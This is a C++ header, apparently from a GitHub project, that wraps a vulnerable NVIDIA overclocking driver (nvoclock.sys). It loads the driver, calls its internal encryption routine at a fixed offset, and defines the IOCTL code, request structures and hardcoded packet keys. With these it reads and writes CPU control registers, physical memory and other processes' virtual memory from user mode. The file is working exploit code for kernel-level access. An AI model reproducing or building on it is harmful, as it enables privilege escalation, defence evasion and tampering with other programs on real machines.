-
Notifications
You must be signed in to change notification settings - Fork 70
/
Copy pathNVDrv.h
220 lines (176 loc) · 5.63 KB
/
NVDrv.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
#pragma once
#include <Windows.h>
#include <iostream>
#include <tlhelp32.h>
class NVDrv
{
public:
/*
* IO call to driver for __readcrX() intrinsic where X = (int cr)
*/
DWORD ReadCr(int cr);
/*
* IO call to driver for __writecrX(value) intrinsic where X = (int cr)
*/
BOOL WriteCr(int cr, DWORD64 value);
/*
* Gets the file path of a running process by name
*/
std::wstring GetProcessPath(const std::wstring& process_name);
/*
* Returns the base address of a running process by name
*/
uintptr_t GetProcessBase(const std::wstring& process_name);
/*
* Bruteforcing to get the directory base of a process with it's base address
*/
uintptr_t GetProcessCR3(uintptr_t base_address);
/*
* Get system directory base by walking PROCESSOR_START_BLOCK
*/
uintptr_t GetSystemCR3();
/*
* IO call to driver for MmGetPhysicalAddress
*/
uintptr_t MmGetPhysicalAddress(uintptr_t virtual_address);
/*
* Translates linear/virtual addresses to physical addresses with rightful directory base
*/
uintptr_t TranslateLinearToPhysicalAddress(uintptr_t virtual_address);
/*
* IO call to driver for physical memory memcpy read via MmMapIoSpace
*/
BOOL ReadPhysicalMemory(uintptr_t physical_address, void* OUT res, int size);
/*
* IO call to driver for physical memory memcpy write via MmMapIoSpace
*/
BOOL WritePhysicalMemory(uintptr_t physical_address, void* IN res, int size);
/*
* Read virtual memory via translating virtual addresses to physical addresses
*/
BOOL ReadVirtualMemory(uintptr_t address, LPVOID output, unsigned long size);
/*
* Write virtual memory via translating virtual addresses to physical addresses
*/
BOOL WriteVirtualMemory(uintptr_t address, LPVOID data, unsigned long size);
/*
* Swap reading context for TranslateLinearToPhysicalAddress
*/
BOOL SwapReadContext(uintptr_t target_cr3);
NVDrv()
{
/*
* Import the vulnerable driver into memory
*/
HMODULE nvoclock = LoadLibraryW(L"C:\\nvoclock.sys");
if (!nvoclock)
{
printf("nvoclock.sys not found at C: directory!\n");
exit(5000);
}
/*
* Get the payload encryption function sub_2130
*/
encrypt_payload = (decltype(encrypt_payload))(__int64(nvoclock) + 0x2130);
/*
* Open a handle to the driver
*/
this->nvhandle = CreateFileW(L"\\\\.\\NVR0Internal", GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_HIDDEN, NULL);
if (this->nvhandle != INVALID_HANDLE_VALUE) {
printf("NVR0Internal Handle: %p\n", this->nvhandle);
}
else {
printf("Driver is not loaded!\n");
exit(5000);
}
}
/*
* Read template for ReadVirtualMemory()
*/
template<typename T>
T Read(uintptr_t address)
{
T buffer;
if (!ReadVirtualMemory(address, &buffer, sizeof(T)))
return NULL;
return buffer;
}
/*
* Write template for WriteVirtualMemory()
*/
template<typename T>
BOOL Write(uintptr_t address, T val)
{
if (!WriteVirtualMemory(address, (LPVOID)&val, sizeof(T)))
return FALSE;
return TRUE;
}
enum NVControlRegisters {
CR0 = 0,
CR2 = 2,
CR3 = 3,
CR4 = 4
};
private:
#define DEBUG TRUE
static int constexpr ioctl_code = 0x9C40A484;
enum class NVFunction : int
{
read_cr = 0,
write_cr = 1,
phys_req = 0x26,
phys_read = 0x14,
phys_write = 0x15
};
struct request { };
struct request_memcpy : request
{
NVFunction request_id;
int size;
__int64 dst_addr;
__int64 src_addr;
char unk[0x20];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
struct request_phys_addr : request
{
NVFunction request_id;
int unk_0;
__int64 result_addr;
__int64 virtual_addr;
int writevalue;
char unk[0x20 - 4];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
struct request_readcr : request
{
NVFunction request_id;
int unk_0;
int cr_num;
int unk10;
int unk14;
int unk18;
int result;
char unk[0x20 - 4];
unsigned __int64 packet_key[0x40 / 8] = { 12868886329971960498, 13552922889676271240, 10838534925730813900, 11819403095038824665,16047435637536096 ,10679697536739367056 ,18271467892729589711 ,6472933704646412218 };;
char unk_data[0x138 - 0x40 - 56];
};
struct request_writecr : request
{
NVFunction request_id;
int unk_0;
int cr_num;
int unk10;
int unk14;
int unk18;
int writevalue;
char unk[0x20 - 4];
unsigned __int64 packet_key[0x40 / 8];
char unk_data[0x138 - 0x40 - 56];
};
void* (*encrypt_payload)(request* data_crypt, int, void* temp_buf) = nullptr;
HANDLE nvhandle = INVALID_HANDLE_VALUE;
uintptr_t target_cr3 = 0;
};